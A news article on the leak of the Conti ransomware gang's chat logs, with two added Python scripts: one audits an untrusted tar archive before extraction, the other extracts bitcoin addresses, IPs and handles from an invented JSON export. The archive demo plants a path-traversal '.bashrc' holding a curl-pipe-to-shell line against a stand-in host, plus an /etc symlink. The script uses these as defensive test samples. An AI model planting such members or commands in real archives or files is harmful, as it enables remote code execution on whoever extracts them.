Russian ransomware gang’s data leaked

More than a year’s worth of private data belonging to Conti has been released to the public by a member who is believed to be Ukrainian, after the Russia-based ransomware group declared its support for Vladimir Putin’s invasion of Ukraine.

“Here is a friendly heads up that the Conti gang has just lost all their s**t,” says a message accompanying a Twitter link to the leaked data, which it adds is a “1.tgz file that can be unpacked running a tar -xzvf command.”

The statement continues: “The contents of the first [information] dump contain the chat communications - current, as of today - of the Conti ransomware gang. We promise it is very interesting.”

And ominously for the Conti group, the statement adds: “There are more dumps coming, stay tuned.”
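The leaker’s instruction to run `tar -xzvf` on the archive skips a step any investigator handling a file from an unknown, hostile source should take: look at what the archive contains before writing it to disk. Tar members can carry `../` path components, absolute paths or symlinks that make extraction write outside the target directory. The script below is an added example (not code from the page, the leaker or Conti) that builds a small constructed `.tgz` in memory, audits every member, and extracts only when the audit is clean; the file names and contents in it are invented for the demo.

```python
import io
import os
import tarfile
import tempfile


def build_sample_archive(include_hostile: bool) -> bytes:
    """Build a small .tgz in memory for the demo.

    This is a constructed archive, not the leaked 1.tgz. It holds one benign
    chat export and, if requested, two members of the kind an untrusted
    archive from an unknown source could carry.
    """
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        def add_file(name: str, data: bytes) -> None:
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))

        add_file("dump/2021/chat.json", b'[{"from": "user1", "body": "hi"}]')
        if include_hostile:
            # Path traversal: a plain tar -x would write this outside the target dir.
            add_file("../../.bashrc", b"curl http://example.invalid/x | sh\n")
            # Symlink to an absolute path: a later member placed under
            # dump/etc/ would be written into the real /etc.
            link = tarfile.TarInfo("dump/etc")
            link.type = tarfile.SYMTYPE
            link.linkname = "/etc"
            tar.addfile(link)
    return buf.getvalue()


def audit_archive(tar_bytes: bytes) -> list[str]:
    """Return one finding per member that must not be extracted blindly.

    An empty list means every member is a plain file or directory whose
    path stays inside the extraction directory.
    """
    findings = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:gz") as tar:
        for m in tar.getmembers():
            parts = m.name.replace("\\", "/").split("/")
            if m.name.startswith("/") or ".." in parts:
                findings.append(f"{m.name}: escapes the extraction directory")
            elif m.issym() or m.islnk():
                # Refusing every link is deliberate: even an in-tree link can
                # redirect a later member outside the tree.
                findings.append(f"{m.name}: link to {m.linkname}")
            elif not (m.isfile() or m.isdir()):
                findings.append(f"{m.name}: special file, type {m.type!r}")
    return findings


def safe_extract(tar_bytes: bytes, dest: str) -> list[str]:
    """Extract into dest only if the audit is clean; return extracted names."""
    findings = audit_archive(tar_bytes)
    if findings:
        raise ValueError("refusing to extract: " + "; ".join(findings))
    kwargs = {}
    if hasattr(tarfile, "data_filter"):
        # Python 3.12+ (and backports): let tarfile enforce the same rules
        # again at write time, so the audit is not the only line of defence.
        kwargs["filter"] = "data"
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:gz") as tar:
        members = tar.getmembers()
        tar.extractall(dest, members=members, **kwargs)
    return [m.name for m in members]


def run_demo() -> dict:
    """Run both the hostile and the clean case and return what happened."""
    hostile = build_sample_archive(include_hostile=True)
    clean = build_sample_archive(include_hostile=False)
    result = {"hostile_findings": audit_archive(hostile)}
    with tempfile.TemporaryDirectory() as d:
        result["clean_extracted"] = safe_extract(clean, d)
        result["clean_on_disk"] = os.path.isfile(
            os.path.join(d, "dump", "2021", "chat.json"))
        try:
            safe_extract(hostile, d)
            result["hostile_refused"] = False
        except ValueError:
            result["hostile_refused"] = True
    return result


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The command-line equivalent of the audit is `tar -tzvf 1.tgz` (list, don’t extract) and a look for `..`, leading `/` and `->` link markers in the listing before any `-x`; the script just does that check mechanically and refuses to proceed when it finds one.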

[Image: screen notification from the anonymous data leaker]

In further use of colorful language, the Conti data, consisting of 13 months’ worth of leaked communications between group members and affiliates, was uploaded to GitHub, the code-hosting platform, under the tagline “Russian warship go f**k yourself”, a reference to the reported killing of 13 Ukrainian border guards by Russian naval forces last week.

The communications were taken from the gang’s XMPP (Jabber) chat server and, after being vetted, were also republished by the malware research collective VX Underground and the data search service Intel X.

The data itself is in JSON format and includes bitcoin addresses, chat handles and IP addresses, Bank Info Security reported. Some of it is altogether more personal, detailing disputes and infighting between cybercriminals and negotiations with ransomware victims.
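Because the export is JSON, the bitcoin addresses, chat handles and IP addresses it contains can be pulled out and cross-referenced mechanically, which is exactly the kind of triage an analyst or investigator does first. The script below is an added example, not code from the page or from any of the groups named in it: it walks a constructed chat export (the field names `ts`, `from`, `to`, `body` and `attachments` are an assumption, since the page does not describe the leak’s real schema), extracts candidate addresses with regular expressions, and records which handle mentioned each one. The sample values are invented or reserved: documentation IP ranges, a made-up base58 string of the right shape, and the example bech32 address from the BIP 173 specification.

```python
import json
import re
from collections import defaultdict

# Constructed sample export for the demo. The page does not describe the
# leak's real schema; the field names and every value below are assumptions.
SAMPLE_EXPORT = json.dumps([
    {"ts": "2021-06-01T10:15:00", "from": "user1@jabber.example",
     "to": "user2@jabber.example",
     # invented base58 string of address shape, not a real address
     "body": "payment to 1Q2W3E4R5T6Y7U8P9A1S2D3F4G5H6J7K8M confirmed"},
    {"ts": "2021-06-01T10:17:00", "from": "user2@jabber.example",
     "to": "user1@jabber.example",
     # RFC 5737 documentation ranges, not real infrastructure
     "body": "ok. new server is 203.0.113.7, old one 198.51.100.23 is burned"},
    {"ts": "2021-06-02T08:00:00", "from": "user3@jabber.example",
     "to": "user1@jabber.example",
     # the bech32 example address from BIP 173
     "body": "send the rest to bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq",
     "attachments": [{"name": "notes.txt",
                      "text": "backup panel 203.0.113.7:8443"}]},
])

# Syntactic pre-filters only: neither pattern verifies the address checksum
# (base58check / bech32), so hits are candidates, to be validated before use.
BTC_BASE58 = re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b")  # P2PKH / P2SH
BTC_BECH32 = re.compile(r"\bbc1[ac-hj-np-z02-9]{38,59}\b")        # segwit
IPV4 = re.compile(
    r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b")


def _strings(obj):
    """Yield every string value in a nested JSON structure (dicts, lists)."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for value in obj.values():
            yield from _strings(value)
    elif isinstance(obj, list):
        for value in obj:
            yield from _strings(value)


def extract_indicators(export_text: str) -> dict:
    """Return handles plus bitcoin/IPv4 candidates mapped to the handles
    that mentioned them. Attachments and any other nested text are scanned
    too, since indicators are not only in the message body."""
    records = json.loads(export_text)
    handles = set()
    btc = defaultdict(set)   # address -> handles that mentioned it
    ips = defaultdict(set)   # IPv4    -> handles that mentioned it
    for rec in records:
        sender = rec.get("from", "<unknown>")
        handles.add(sender)
        if "to" in rec:
            handles.add(rec["to"])
        for text in _strings(rec):
            for hit in BTC_BASE58.findall(text) + BTC_BECH32.findall(text):
                btc[hit].add(sender)
            for hit in IPV4.findall(text):
                ips[hit].add(sender)
    return {
        "handles": sorted(handles),
        "btc": {k: sorted(v) for k, v in sorted(btc.items())},
        "ipv4": {k: sorted(v) for k, v in sorted(ips.items())},
    }


if __name__ == "__main__":
    print(json.dumps(extract_indicators(SAMPLE_EXPORT), indent=2))
```

The output is the starting point, not the conclusion: an address that two handles both quote links those handles to one payment flow, and an IP that recurs across months is worth checking against hosting records and other cases, but every regex hit still needs checksum validation and a second source before it goes into a report.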

Shaken to its core

Conti is thought to operate a ransomware-as-a-service model: a core group develops and maintains the ransomware and its supporting infrastructure and supplies them to ‘freelance’ affiliates, who break into businesses and deploy the malware. The core group takes a 30% cut of the ransom proceeds in return for providing the tooling and facilitating the attacks.

While the leaker has not been identified, some believe the data came from a disgruntled former Conti affiliate unhappy with the core group’s decision to publicly support Putin’s invasion.

On Friday, Conti posted a statement on its own data-leak site declaring that it would avenge any cyber attacks against Russia. The group has long been suspected of having ties to Russia’s Federal Security Service (FSB) and to the GRU, its military intelligence agency.

More tough times for cyber crooks

Whoever is responsible for it, the leak has serious knock-on implications for cyber criminals, who may find themselves less able to operate with impunity. Although threat actors are unlikely to reveal their real names or addresses even on their own chat server, the bitcoin addresses, IP addresses and handles in the leaked data give law enforcement bodies such as the FBI material to correlate with other investigations in seeking to trace them.

Perhaps mindful of this danger, another ransomware group, Lockbit, has recently reaffirmed its apolitical stance, describing itself as a purely criminal group motivated by money.